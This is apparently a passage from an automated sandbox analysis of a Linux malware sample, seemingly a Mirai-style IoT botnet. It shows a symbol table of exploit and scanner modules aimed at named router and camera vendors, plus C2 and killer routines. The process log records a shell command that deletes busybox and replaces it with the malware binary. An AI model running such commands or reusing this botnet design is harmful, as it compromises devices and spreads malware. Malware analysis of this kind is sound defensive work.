                          first_connect.symtab0x43067c4OBJECT<unknown>DEFAULT12
                          fmt.symtab0x4200a020OBJECT<unknown>DEFAULT4
                          fopen.symtab0x4198d424FUNC<unknown>DEFAULT2
                          fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fork.symtab0x417ba8572FUNC<unknown>DEFAULT2
                          fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fork_handler_pool.symtab0x4308701348OBJECT<unknown>DEFAULT12
                          fputs_unlocked.symtab0x41522868FUNC<unknown>DEFAULT2
                          fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          frame_dummy.symtab0x4001600FUNC<unknown>DEFAULT2
                          free.symtab0x416f14384FUNC<unknown>DEFAULT2
                          free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fseek.symtab0x41b96428FUNC<unknown>DEFAULT2
                          fseeko.symtab0x41b96428FUNC<unknown>DEFAULT2
                          fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fseeko64.symtab0x41b980316FUNC<unknown>DEFAULT2
                          fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fstat.symtab0x418e6c96FUNC<unknown>DEFAULT2
                          fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fwrite_unlocked.symtab0x41526c168FUNC<unknown>DEFAULT2
                          fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getc.symtab0x41a5b8212FUNC<unknown>DEFAULT2
                          getc_unlocked.symtab0x41aac8216FUNC<unknown>DEFAULT2
                          getdents.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getdtablesize.symtab0x418f7c52FUNC<unknown>DEFAULT2
                          getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getegid.symtab0x418fb018FUNC<unknown>DEFAULT2
                          getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          geteuid.symtab0x418fc218FUNC<unknown>DEFAULT2
                          geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getgid.symtab0x418fd418FUNC<unknown>DEFAULT2
                          getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getpagesize.symtab0x418fe828FUNC<unknown>DEFAULT2
                          getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getpid.symtab0x417de452FUNC<unknown>DEFAULT2
                          getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getppid.symtab0x413c9816FUNC<unknown>DEFAULT2
                          getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getrlimit.symtab0x41900464FUNC<unknown>DEFAULT2
                          getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getsockname.symtab0x415df464FUNC<unknown>DEFAULT2
                          getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getsockopt.symtab0x415e3468FUNC<unknown>DEFAULT2
                          getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          getuid.symtab0x41904418FUNC<unknown>DEFAULT2
                          getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          gpon443.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          gpon443_fake_time.symtab0x4305704OBJECT<unknown>DEFAULT12
                          gpon443_init.symtab0x4073002812FUNC<unknown>DEFAULT2
                          gpon443_init_pid.symtab0x4305404OBJECT<unknown>DEFAULT12
                          gpon443_init_rawpkt.symtab0x43054840OBJECT<unknown>DEFAULT12
                          gpon443_ranges.symtab0x4301bc44OBJECT<unknown>DEFAULT10
                          gpon443_rsck.symtab0x4305444OBJECT<unknown>DEFAULT12
                          gpon443_setup_connection.symtab0x407240188FUNC<unknown>DEFAULT2
                          gpon80.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          gpon80_fake_time.symtab0x4305a44OBJECT<unknown>DEFAULT12
                          gpon80_init.symtab0x407ec02748FUNC<unknown>DEFAULT2
                          gpon80_init_pid.symtab0x4305744OBJECT<unknown>DEFAULT12
                          gpon80_init_rawpkt.symtab0x43057c40OBJECT<unknown>DEFAULT12
                          gpon80_rsck.symtab0x4305784OBJECT<unknown>DEFAULT12
                          gpon80_setup_connection.symtab0x407e00188FUNC<unknown>DEFAULT2
                          h_errno.symtab0x44TLS<unknown>DEFAULT6
                          hexPayload.symtab0x4301944OBJECT<unknown>DEFAULT10
                          hnap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          hnap_init.symtab0x408a402496FUNC<unknown>DEFAULT2
                          hnapscanner_fake_time.symtab0x4305d84OBJECT<unknown>DEFAULT12
                          hnapscanner_rsck.symtab0x4305ac4OBJECT<unknown>DEFAULT12
                          hnapscanner_scanner_pid.symtab0x4305a84OBJECT<unknown>DEFAULT12
                          hnapscanner_scanner_rawpkt.symtab0x4305b040OBJECT<unknown>DEFAULT12
                          hnapscanner_setup_connection.symtab0x408980188FUNC<unknown>DEFAULT2
                          httpd.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          httpd_pid.symtab0x4301e84OBJECT<unknown>DEFAULT10
                          httpd_port.symtab0x4306844OBJECT<unknown>DEFAULT12
                          httpd_serve.symtab0x409460472FUNC<unknown>DEFAULT2
                          httpd_start.symtab0x409640456FUNC<unknown>DEFAULT2
                          httpd_started.symtab0x4306884OBJECT<unknown>DEFAULT12
                          huawei.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          huawei_fake_time.symtab0x43060c4OBJECT<unknown>DEFAULT12
                          huawei_init.symtab0x4098e02780FUNC<unknown>DEFAULT2
                          huawei_rsck.symtab0x4305e04OBJECT<unknown>DEFAULT12
                          huawei_scanner_pid.symtab0x4305dc4OBJECT<unknown>DEFAULT12
                          huawei_scanner_rawpkt.symtab0x4305e440OBJECT<unknown>DEFAULT12
                          huawei_setup_connection.symtab0x409820188FUNC<unknown>DEFAULT2
                          id_buf.symtab0x43336832OBJECT<unknown>DEFAULT12
                          index.symtab0x41ad68196FUNC<unknown>DEFAULT2
                          inet_addr.symtab0x415c2044FUNC<unknown>DEFAULT2
                          inet_aton.symtab0x41b114200FUNC<unknown>DEFAULT2
                          inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          init_static_tls.symtab0x41b3e064FUNC<unknown>DEFAULT2
                          initstate.symtab0x417264120FUNC<unknown>DEFAULT2
                          initstate_r.symtab0x417474204FUNC<unknown>DEFAULT2
                          intr.symtab0x430dc820OBJECT<unknown>DEFAULT12
                          ioctl.symtab0x41b744268FUNC<unknown>DEFAULT2
                          ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          isatty.symtab0x41b07c36FUNC<unknown>DEFAULT2
                          isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          jaws.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          jaws_fake_time.symtab0x4306404OBJECT<unknown>DEFAULT12
                          jaws_init.symtab0x40a4802496FUNC<unknown>DEFAULT2
                          jaws_init_pid.symtab0x4306104OBJECT<unknown>DEFAULT12
                          jaws_init_rawpkt.symtab0x43061840OBJECT<unknown>DEFAULT12
                          jaws_rsck.symtab0x4306144OBJECT<unknown>DEFAULT12
                          jaws_setup_connection.symtab0x40a3c0188FUNC<unknown>DEFAULT2
                          kill.symtab0x413ca860FUNC<unknown>DEFAULT2
                          kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          killer.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          killer_init.symtab0x40afc0292FUNC<unknown>DEFAULT2
                          killer_kill.symtab0x40ae4048FUNC<unknown>DEFAULT2
                          killer_mirai_exists.symtab0x40ae80320FUNC<unknown>DEFAULT2
                          killer_pid.symtab0x4306444OBJECT<unknown>DEFAULT12
                          lblink_fake_time.symtab0x4304d04OBJECT<unknown>DEFAULT12
                          lblink_init.symtab0x404d602876FUNC<unknown>DEFAULT2
                          lblink_rsck.symtab0x4304a44OBJECT<unknown>DEFAULT12
                          lblink_scanner_pid.symtab0x4304a04OBJECT<unknown>DEFAULT12
                          lblink_scanner_rawpkt.symtab0x4304a840OBJECT<unknown>DEFAULT12
                          lblink_setup_connection.symtab0x404ca0188FUNC<unknown>DEFAULT2
                          libc-cancellation.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          libc-tls.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          linksys.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          linksys_fake_time.symtab0x4306784OBJECT<unknown>DEFAULT12
                          linksys_init.symtab0x40b1c02496FUNC<unknown>DEFAULT2
                          linksys_rsck.symtab0x43064c4OBJECT<unknown>DEFAULT12
                          linksys_scanner_pid.symtab0x4306484OBJECT<unknown>DEFAULT12
                          linksys_scanner_rawpkt.symtab0x43065040OBJECT<unknown>DEFAULT12
                          linksys_setup_connection.symtab0x40b100188FUNC<unknown>DEFAULT2
                          listen.symtab0x415e7864FUNC<unknown>DEFAULT2
                          listen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          lock.symtab0x430df44OBJECT<unknown>DEFAULT12
                          lockdown.symtab0x4333644OBJECT<unknown>DEFAULT12
                          lseek64.symtab0x41be48108FUNC<unknown>DEFAULT2
                          main.symtab0x40bd402596FUNC<unknown>DEFAULT2
                          main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          main_pid.symtab0x43338c4OBJECT<unknown>DEFAULT12
                          malloc.symtab0x4162d41732FUNC<unknown>DEFAULT2
                          malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          malloc_trim.symtab0x41709452FUNC<unknown>DEFAULT2
                          memchr.symtab0x41ac8024FUNC<unknown>DEFAULT2
                          memcpy.symtab0x415480860FUNC<unknown>DEFAULT2
                          memmove.symtab0x4158c0188FUNC<unknown>DEFAULT2
                          memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          mempcpy.symtab0x41bd8036FUNC<unknown>DEFAULT2
                          mempcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          memrchr.symtab0x41aca0200FUNC<unknown>DEFAULT2
                          memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          memset.symtab0x415820150FUNC<unknown>DEFAULT2
                          methods.symtab0x43047c4OBJECT<unknown>DEFAULT12
                          methods_len.symtab0x4304781OBJECT<unknown>DEFAULT12
                          mmap.symtab0x418d2464FUNC<unknown>DEFAULT2
                          mmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          mremap.symtab0x41905868FUNC<unknown>DEFAULT2
                          mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          munmap.symtab0x41909c60FUNC<unknown>DEFAULT2
                          munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          mylock.symtab0x43023c24OBJECT<unknown>DEFAULT10
                          mylock.symtab0x43025424OBJECT<unknown>DEFAULT10
                          nanosleep.symtab0x419118108FUNC<unknown>DEFAULT2
                          nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          netlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          netlink_fake_time.symtab0x4306c44OBJECT<unknown>DEFAULT12
                          netlink_init.symtab0x40c8403108FUNC<unknown>DEFAULT2
                          netlink_init_pid.symtab0x4306944OBJECT<unknown>DEFAULT12
                          netlink_init_rawpkt.symtab0x43069c40OBJECT<unknown>DEFAULT12
                          netlink_range.symtab0x4301f836OBJECT<unknown>DEFAULT10
                          netlink_rsck.symtab0x4306984OBJECT<unknown>DEFAULT12
                          netlink_setup_connection.symtab0x40c780188FUNC<unknown>DEFAULT2
                          next_start.1251.symtab0x4308604OBJECT<unknown>DEFAULT12
                          nprocessors_onln.symtab0x417698264FUNC<unknown>DEFAULT2
                          nuuo.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          nuuo_fake_time.symtab0x4306f84OBJECT<unknown>DEFAULT12
                          nuuo_init.symtab0x40d5402788FUNC<unknown>DEFAULT2
                          nuuo_rsck.symtab0x4306cc4OBJECT<unknown>DEFAULT12
                          nuuo_scanner_pid.symtab0x4306c84OBJECT<unknown>DEFAULT12
                          nuuo_scanner_rawpkt.symtab0x4306d040OBJECT<unknown>DEFAULT12
                          nuuo_setup_connection.symtab0x40d480188FUNC<unknown>DEFAULT2
                          object.4732.symtab0x43042c24OBJECT<unknown>DEFAULT12
                          open.symtab0x4180c0172FUNC<unknown>DEFAULT2
                          opendir.symtab0x414104176FUNC<unknown>DEFAULT2
                          opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          p.4718.symtab0x4301900OBJECT<unknown>DEFAULT10
                          parse_config.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          parse_request.symtab0x40940096FUNC<unknown>DEFAULT2
                          pending_connection.symtab0x43068c1OBJECT<unknown>DEFAULT12
                          pgid.symtab0x4306904OBJECT<unknown>DEFAULT12
                          prctl.symtab0x413ce468FUNC<unknown>DEFAULT2
                          prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          prefix.6143.symtab0x41f0c812OBJECT<unknown>DEFAULT4
                          program_invocation_name.symtab0x4303204OBJECT<unknown>DEFAULT10
                          program_invocation_short_name.symtab0x43031c4OBJECT<unknown>DEFAULT10
                          qual_chars.6152.symtab0x41f0dc20OBJECT<unknown>DEFAULT4
                          quit.symtab0x430ddc20OBJECT<unknown>DEFAULT12
                          raise.symtab0x417e18116FUNC<unknown>DEFAULT2
                          raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          rand.symtab0x41718020FUNC<unknown>DEFAULT2
                          rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          rand_alphastr.symtab0x40e100276FUNC<unknown>DEFAULT2
                          rand_init.symtab0x40e0a096FUNC<unknown>DEFAULT2
                          rand_next.symtab0x40e04068FUNC<unknown>DEFAULT2
                          rand_str.symtab0x40e220252FUNC<unknown>DEFAULT2
                          random.symtab0x417194100FUNC<unknown>DEFAULT2
                          random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          random_poly_info.symtab0x41fccc40OBJECT<unknown>DEFAULT4
                          random_r.symtab0x41733c108FUNC<unknown>DEFAULT2
                          random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          randtbl.symtab0x430280128OBJECT<unknown>DEFAULT10
                          rawmemchr.symtab0x41bda4164FUNC<unknown>DEFAULT2
                          rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          read.symtab0x4182c0172FUNC<unknown>DEFAULT2
                          readdir.symtab0x414254148FUNC<unknown>DEFAULT2
                          readdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          readdir64.symtab0x419280152FUNC<unknown>DEFAULT2
                          readdir64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          readlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          realloc.symtab0x416a7c692FUNC<unknown>DEFAULT2
                          realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          realtek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          realtek_init.symtab0x40e3e02564FUNC<unknown>DEFAULT2
                          realtekscanner_fake_time.symtab0x4307404OBJECT<unknown>DEFAULT12
                          realtekscanner_rsck.symtab0x4307144OBJECT<unknown>DEFAULT12
                          realtekscanner_scanner_pid.symtab0x4307104OBJECT<unknown>DEFAULT12
                          realtekscanner_scanner_rawpkt.symtab0x43071840OBJECT<unknown>DEFAULT12
                          realtekscanner_setup_connection.symtab0x40e320188FUNC<unknown>DEFAULT2
                          recv.symtab0x415ef8128FUNC<unknown>DEFAULT2
                          recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          recvfrom.symtab0x415fbc144FUNC<unknown>DEFAULT2
                          recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          register-atfork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          remove.symtab0x41434c124FUNC<unknown>DEFAULT2
                          remove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          resolv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          resolv_entries_free.symtab0x40ee0080FUNC<unknown>DEFAULT2
                          resolv_lookup.symtab0x40ee601228FUNC<unknown>DEFAULT2
                          resolve_cnc_addr.symtab0x40bb80180FUNC<unknown>DEFAULT2
                          resolve_func.symtab0x4301f44OBJECT<unknown>DEFAULT10
                          rindex.symtab0x41af5880FUNC<unknown>DEFAULT2
                          rmdir.symtab0x41918460FUNC<unknown>DEFAULT2
                          rmdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          sa_refcntr.symtab0x430df04OBJECT<unknown>DEFAULT12
                          sbrk.symtab0x418d64104FUNC<unknown>DEFAULT2
                          sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          scanner_init.symtab0x40bc40236FUNC<unknown>DEFAULT2
                          select.symtab0x413d6c136FUNC<unknown>DEFAULT2
                          select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          send.symtab0x41608c128FUNC<unknown>DEFAULT2
                          send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          sendto.symtab0x416150144FUNC<unknown>DEFAULT2
                          sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          setjmp.symtab0x418de04FUNC<unknown>DEFAULT2
                          setsid.symtab0x413df460FUNC<unknown>DEFAULT2
                          setsid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          setsockopt.symtab0x4161e068FUNC<unknown>DEFAULT2
                          setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          setstate.symtab0x4171f8108FUNC<unknown>DEFAULT2
                          setstate_r.symtab0x417540228FUNC<unknown>DEFAULT2
                          sigaction.symtab0x41b1dc20FUNC<unknown>DEFAULT2
                          sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          sigjmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          sigprocmask.symtab0x4191c0116FUNC<unknown>DEFAULT2
                          sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          sleep.symtab0x417e8c224FUNC<unknown>DEFAULT2
                          sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          socket.symtab0x41622464FUNC<unknown>DEFAULT2
                          socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          spec_and_mask.6151.symtab0x41f0f016OBJECT<unknown>DEFAULT4
                          spec_base.6142.symtab0x41f0d47OBJECT<unknown>DEFAULT4
                          spec_chars.6148.symtab0x41f14021OBJECT<unknown>DEFAULT4
                          spec_flags.6147.symtab0x41f1588OBJECT<unknown>DEFAULT4
                          spec_or_mask.6150.symtab0x41f10016OBJECT<unknown>DEFAULT4
                          spec_ranges.6149.symtab0x41f1109OBJECT<unknown>DEFAULT4
                          sprintf.symtab0x4143c8132FUNC<unknown>DEFAULT2
                          sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          srand.symtab0x4172dc96FUNC<unknown>DEFAULT2
                          srandom.symtab0x4172dc96FUNC<unknown>DEFAULT2
                          srandom_r.symtab0x4173a8204FUNC<unknown>DEFAULT2
                          srv_addr.symtab0x43339016OBJECT<unknown>DEFAULT12
                          stat.symtab0x413e3096FUNC<unknown>DEFAULT2
                          stat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          static_dtv.symtab0x432e18512OBJECT<unknown>DEFAULT12
                          static_map.symtab0x43332052OBJECT<unknown>DEFAULT12
                          static_slotinfo.symtab0x433018776OBJECT<unknown>DEFAULT12
                          stderr.symtab0x4303344OBJECT<unknown>DEFAULT10
                          stdin.symtab0x43032c4OBJECT<unknown>DEFAULT10
                          stdout.symtab0x4303304OBJECT<unknown>DEFAULT10
                          strchr.symtab0x41ad68196FUNC<unknown>DEFAULT2
                          strchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strchrnul.symtab0x41ae2c192FUNC<unknown>DEFAULT2
                          strchrnul.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strcmp.symtab0x41aeec34FUNC<unknown>DEFAULT2
                          strcmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strcoll.symtab0x41aeec34FUNC<unknown>DEFAULT2
                          strcspn.symtab0x41af1072FUNC<unknown>DEFAULT2
                          strcspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strdup.symtab0x415bbc76FUNC<unknown>DEFAULT2
                          strdup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strerror_r.symtab0x415adc224FUNC<unknown>DEFAULT2
                          strlen.symtab0x41536088FUNC<unknown>DEFAULT2
                          strnlen.symtab0x41597c136FUNC<unknown>DEFAULT2
                          strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strpbrk.symtab0x41b05044FUNC<unknown>DEFAULT2
                          strpbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strrchr.symtab0x41af5880FUNC<unknown>DEFAULT2
                          strrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strspn.symtab0x41afa848FUNC<unknown>DEFAULT2
                          strspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strstr.symtab0x415a04182FUNC<unknown>DEFAULT2
                          strstr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strtok.symtab0x415c0824FUNC<unknown>DEFAULT2
                          strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          strtok_r.symtab0x41afd8120FUNC<unknown>DEFAULT2
                          strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          sysconf.symtab0x4177a01032FUNC<unknown>DEFAULT2
                          sysconf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          system.symtab0x418cac120FUNC<unknown>DEFAULT2
                          system.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          table.symtab0x4333a056OBJECT<unknown>DEFAULT12
                          table.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          table_init.symtab0x40f480208FUNC<unknown>DEFAULT2
                          table_key.symtab0x43021c4OBJECT<unknown>DEFAULT10
                          table_lock_val.symtab0x40f380120FUNC<unknown>DEFAULT2
                          table_retrieve_val.symtab0x40f34036FUNC<unknown>DEFAULT2
                          table_unlock_val.symtab0x40f400120FUNC<unknown>DEFAULT2
                          tcgetattr.symtab0x41b0a0116FUNC<unknown>DEFAULT2
                          tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          tcp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          thinkphp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          thinkphp_fake_time.symtab0x4307744OBJECT<unknown>DEFAULT12
                          thinkphp_init.symtab0x40f6202784FUNC<unknown>DEFAULT2
                          thinkphp_init_pid.symtab0x4307444OBJECT<unknown>DEFAULT12
                          thinkphp_init_rawpkt.symtab0x43074c40OBJECT<unknown>DEFAULT12
                          thinkphp_rsck.symtab0x4307484OBJECT<unknown>DEFAULT12
                          thinkphp_setup_connection.symtab0x40f560188FUNC<unknown>DEFAULT2
                          time.symtab0x413e9016FUNC<unknown>DEFAULT2
                          time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          times.symtab0x41923416FUNC<unknown>DEFAULT2
                          times.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          totolink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          totolink_fake_time.symtab0x4307a84OBJECT<unknown>DEFAULT12
                          totolink_init.symtab0x4101c02872FUNC<unknown>DEFAULT2
                          totolink_rsck.symtab0x43077c4OBJECT<unknown>DEFAULT12
                          totolink_scanner_pid.symtab0x4307784OBJECT<unknown>DEFAULT12
                          totolink_scanner_rawpkt.symtab0x43078040OBJECT<unknown>DEFAULT12
                          totolink_setup_connection.symtab0x410100188FUNC<unknown>DEFAULT2
                          tplink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          tplink_fake_time.symtab0x4307e04OBJECT<unknown>DEFAULT12
                          tplink_init.symtab0x410dc02872FUNC<unknown>DEFAULT2
                          tplink_rsck.symtab0x4307b44OBJECT<unknown>DEFAULT12
                          tplink_scanner_pid.symtab0x4307b04OBJECT<unknown>DEFAULT12
                          tplink_scanner_rawpkt.symtab0x4307b840OBJECT<unknown>DEFAULT12
                          tplink_setup_connection.symtab0x410d00188FUNC<unknown>DEFAULT2
                          tr064.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          tr064_fake_time.symtab0x4308184OBJECT<unknown>DEFAULT12
                          tr064_init.symtab0x4119c02568FUNC<unknown>DEFAULT2
                          tr064_rsck.symtab0x4307ec4OBJECT<unknown>DEFAULT12
                          tr064_scanner_pid.symtab0x4307e84OBJECT<unknown>DEFAULT12
                          tr064_scanner_rawpkt.symtab0x4307f040OBJECT<unknown>DEFAULT12
                          tr064_setup_connection.symtab0x411900188FUNC<unknown>DEFAULT2
                          tvt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          tvt_fake_time.symtab0x43084c4OBJECT<unknown>DEFAULT12
                          tvt_init.symtab0x4124a02996FUNC<unknown>DEFAULT2
                          tvt_rsck.symtab0x4308204OBJECT<unknown>DEFAULT12
                          tvt_scanner_pid.symtab0x43081c4OBJECT<unknown>DEFAULT12
                          tvt_scanner_rawpkt.symtab0x43082440OBJECT<unknown>DEFAULT12
                          tvt_setup_connection.symtab0x4123e0188FUNC<unknown>DEFAULT2
                          type_codes.symtab0x41f11a24OBJECT<unknown>DEFAULT4
                          type_sizes.symtab0x41f13412OBJECT<unknown>DEFAULT4
                          unknown.1274.symtab0x41f16014OBJECT<unknown>DEFAULT4
                          unlink.symtab0x41924460FUNC<unknown>DEFAULT2
                          unlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          unsafe_state.symtab0x43026c20OBJECT<unknown>DEFAULT10
                          update_bins.symtab0x413200420FUNC<unknown>DEFAULT2
                          update_process.symtab0x4041204FUNC<unknown>DEFAULT2
                          updating.symtab0x4306804OBJECT<unknown>DEFAULT12
                          util.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          util_atoi.symtab0x4133c0380FUNC<unknown>DEFAULT2
                          util_isalpha.symtab0x41314024FUNC<unknown>DEFAULT2
                          util_isdigit.symtab0x41316012FUNC<unknown>DEFAULT2
                          util_itoa.symtab0x413540244FUNC<unknown>DEFAULT2
                          util_local_addr.symtab0x413180128FUNC<unknown>DEFAULT2
                          util_memcpy.symtab0x41310020FUNC<unknown>DEFAULT2
                          util_strcat.symtab0x41308064FUNC<unknown>DEFAULT2
                          util_strcpy.symtab0x4130c050FUNC<unknown>DEFAULT2
                          util_strlen.symtab0x41306024FUNC<unknown>DEFAULT2
                          util_zero.symtab0x41312020FUNC<unknown>DEFAULT2
                          vsnprintf.symtab0x41444c180FUNC<unknown>DEFAULT2
                          vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          w.symtab0x43070c4OBJECT<unknown>DEFAULT12
                          waitpid.symtab0x41b320172FUNC<unknown>DEFAULT2
                          wcrtomb.symtab0x41963868FUNC<unknown>DEFAULT2
                          wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          wcsnrtombs.symtab0x41969c124FUNC<unknown>DEFAULT2
                          wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          wcsrtombs.symtab0x41967c32FUNC<unknown>DEFAULT2
                          wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          write.symtab0x4181c0172FUNC<unknown>DEFAULT2
                          x.symtab0x4307004OBJECT<unknown>DEFAULT12
                          xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          y.symtab0x4307044OBJECT<unknown>DEFAULT12
                          z.symtab0x4307084OBJECT<unknown>DEFAULT12
                          Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                          System Behavior

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:/tmp/cN7jzEkjeq.elf
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/bin/sh
                          Arguments:/bin/sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/cN7jzEkjeq.elf bin/busybox; chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A"
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/bin/sh
                          Arguments:-
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/usr/bin/rm
                          Arguments:rm -rf bin/busybox
                          File size:72056 bytes
                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

